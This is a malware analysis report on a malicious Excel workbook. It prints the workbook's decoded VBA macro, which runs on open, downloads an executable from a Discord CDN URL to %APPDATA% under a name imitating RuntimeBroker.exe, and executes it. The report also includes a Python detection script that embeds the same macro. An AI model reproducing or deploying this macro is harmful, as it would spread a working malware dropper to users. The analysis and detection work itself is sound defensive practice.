Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 76ce42bb3d5923d2…

MALICIOUS

Office (OOXML)

37.7 KB Created: 2021-05-27 08:33:09 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-29
MD5: 3fd0ad1b36586f7c3020cfad2bab3ce0 SHA-1: 70ae06167b637038c7892d7f12a82124c71edeab SHA-256: 76ce42bb3d5923d2fca1ab88ddbc5b906e6fccf988c10fd93b8f22d98693d7b1
98 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The Workbook_Open handler fires when the workbook is opened and calls YourSub, which uses URLDownloadToFileW (imported from urlmon under the local name fDownloadUnicode) to fetch a payload from a Discord CDN attachment URL and write it to %APPDATA%\Runtime_Broker.exe, then launches that file with ShellExecuteW (shell32.dll, imported as fExecuteUnicode) using the "Open" verb. The filename imitates the legitimate Windows RuntimeBroker.exe, which lives in System32, not in a user's %APPDATA%. This is downloader/dropper behaviour. Note that the Declare statements use LongLong parameter types, which VBA accepts only on 64-bit Office, so the macro compiles and runs only in 64-bit Excel; on 32-bit Office the module fails to compile.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
    Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
    Call YourSub
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    sUrl = "https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe"
    sPath = Environ("APPDATA") & "\Runtime_Broker.exe"
    Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe Referenced by macro
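The heuristics above can be reproduced offline from the decoded VBA source alone. The script below is an added example written for this page, not code from the analysis platform or from the sample: it takes the macro text as olevba would emit it (here reproduced from the extracted-artifact preview), resolves Declare aliases to their Win32 API names, flags auto-exec entry points, extracts URLs, rewrites the Environ() concatenation into the expected drop path, notes the 64-bit-only LongLong signatures, and checks whether the path written by a download import is later handed to an execute import. The rule names, severity labels and the three-tier verdict are this example's own conventions, not the report's.

```python
"""Triage of decoded VBA source for the download-and-execute pattern in this report.
Example code written for this page; rule names and severities are this example's own."""
import re
from dataclasses import dataclass, field

# Macro source reproduced from the report's extracted-artifact preview (macros.bas).
SAMPLE_VBA = r'''
Option Explicit
Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong
Private Sub Workbook_Open()
Call YourSub
End Sub
Private Sub YourSub()
Dim sUrl As String, sPath As String
sUrl = "https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe"
sPath = Environ("APPDATA") & "\Runtime_Broker.exe"
Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
Call fExecuteUnicode(0, StrPtr("Open"), StrPtr(sPath), 0, 0, 1)
End Sub
'''

# Win32 imports relevant to a downloader, keyed by API name with the A/W suffix removed.
SUSPICIOUS_IMPORTS = {
    "urldownloadtofile": ("critical", "download"),
    "shellexecute": ("high", "execute"),
    "winexec": ("high", "execute"),
    "createprocess": ("high", "execute"),
}
AUTO_EXEC = ("Workbook_Open", "Auto_Open", "AutoOpen", "Document_Open", "AutoExec")

DECLARE_RE = re.compile(
    r'^\s*(?:Private|Public)?\s*Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)'
    r'\s+Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?', re.I | re.M)
URL_RE = re.compile(r'https?://[^\s"\']+', re.I)
ENVIRON_RE = re.compile(r'^\s*(\w+)\s*=\s*Environ\("(\w+)"\)\s*&\s*"([^"]*)"', re.I | re.M)

@dataclass
class Finding:
    rule: str
    severity: str
    detail: str

@dataclass
class Triage:
    findings: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    drop_paths: dict = field(default_factory=dict)  # variable -> %ENV%\suffix
    imports: dict = field(default_factory=dict)     # local name -> (api, role)

def _api_name(alias, local):
    # URLDownloadToFileW and URLDownloadToFileA collapse to the same key.
    return re.sub(r'[aw]$', '', (alias or local).lower())

def _split_args(s):
    """Split an argument list on top-level commas only (StrPtr(x) stays intact)."""
    args, depth, cur = [], 0, ''
    for ch in s:
        depth += (ch == '(') - (ch == ')')
        if ch == ',' and depth == 0:
            args.append(cur.strip()); cur = ''
        else:
            cur += ch
    return args + ([cur.strip()] if cur.strip() else [])

def _call_args(src, fn):
    """Arguments of the first call site of fn, skipping its Declare line."""
    for line in src.splitlines():
        if DECLARE_RE.match(line):
            continue
        m = re.search(r'\b%s\s*\((.*)\)\s*$' % re.escape(fn), line)
        if m:
            return _split_args(m.group(1))
    return None

def _deref(arg):
    """StrPtr(sPath) -> sPath; anything else is returned as written."""
    m = re.fullmatch(r'StrPtr\((.+)\)', arg.strip())
    return m.group(1) if m else arg.strip()

def triage(src: str) -> Triage:
    t = Triage()
    for local, lib, alias in DECLARE_RE.findall(src):
        api = _api_name(alias, local)
        if api in SUSPICIOUS_IMPORTS:
            sev, role = SUSPICIOUS_IMPORTS[api]
            t.imports[local] = (api, role)
            t.findings.append(Finding("VBA_DECLARE_" + role.upper(), sev,
                                      f"{alias or local} from {lib} imported as {local}"))
    for name in AUTO_EXEC:
        if re.search(r'^\s*(?:Private|Public)?\s*Sub\s+%s\b' % name, src, re.I | re.M):
            t.findings.append(Finding("VBA_AUTOEXEC", "low", f"{name} runs on document open"))
    t.urls = sorted(set(URL_RE.findall(src)))
    for var, env, suffix in ENVIRON_RE.findall(src):
        t.drop_paths[var] = f"%{env.upper()}%{suffix}"
    if re.search(r'\bLongLong\b', src):
        t.findings.append(Finding("VBA_64BIT_ONLY", "info",
                                  "LongLong in Declare signatures: compiles only under 64-bit Office"))
    # Chain check: URLDownloadToFile's 3rd argument (szFileName) later appears as
    # ShellExecute's 3rd argument (lpFile). Download imports are visited first.
    dl_paths = set()
    for local, (api, role) in sorted(t.imports.items(), key=lambda kv: kv[1][1] != "download"):
        args = _call_args(src, local)
        if not args or len(args) < 3:
            continue
        if role == "download":
            dl_paths.add(_deref(args[2]))
        elif _deref(args[2]) in dl_paths:
            path = t.drop_paths.get(_deref(args[2]), _deref(args[2]))
            t.findings.append(Finding("VBA_DOWNLOAD_EXECUTE", "critical",
                                      f"{path} downloaded then executed via {api}"))
    return t

def verdict(t: Triage) -> str:
    sev = {f.severity for f in t.findings}
    if "critical" in sev:
        return "MALICIOUS"
    if sev & {"high", "medium"}:
        return "SUSPICIOUS"
    return "NOT-FLAGGED"

if __name__ == "__main__":
    t = triage(SAMPLE_VBA)
    for f in t.findings:
        print(f"[{f.severity:8}] {f.rule}: {f.detail}")
    print("URLs:", *t.urls)
    print("Drop paths:", t.drop_paths)
    print("Verdict:", verdict(t))
```

Feeding the report's macro through triage() yields the same picture as the heuristics table: a critical download import, a high execute import, a low auto-exec entry point, the Discord CDN URL, the drop path %APPDATA%\Runtime_Broker.exe, and a critical download-then-execute chain. The alias resolution matters because the declared names (fDownloadUnicode, fExecuteUnicode) are arbitrary; a rule matching only on local function names would miss this sample.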

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename    Kind    Source    Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1528 bytes
SHA-256: 575eefd8e0fd850707881088dec0996b09d463c79e2297278c9767a4043de44d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private Declare PtrSafe Function fDownloadUnicode Lib "urlmon" Alias "URLDownloadToFileW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong) As LongLong
Private Declare PtrSafe Function fExecuteUnicode Lib "shell32.dll" Alias "ShellExecuteW" (ByVal Value1 As LongLong, ByVal Value2 As LongLong, ByVal Value3 As LongLong, ByVal Value4 As LongLong, ByVal Value5 As LongLong, ByVal Value6 As LongLong) As LongLong

Private Sub Workbook_Open()
Call YourSub
End Sub

Private Sub YourSub()
Dim sUrl As String, sPath As String
sUrl = "https://cdn.discordapp.com/attachments/846783403826872354/846783966563926155/RuntimeBroker.exe"
sPath = Environ("APPDATA") & "\Runtime_Broker.exe"
Call fDownloadUnicode(0, StrPtr(sUrl), StrPtr(sPath), 0, 0)
Call fExecuteUnicode(0, StrPtr("Open"), StrPtr(sPath), 0, 0, 1)
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 10240 bytes
SHA-256: 5a0be406ab06f0cad16493d86958c3280f102b33d4b788658fd235f0d8bdef99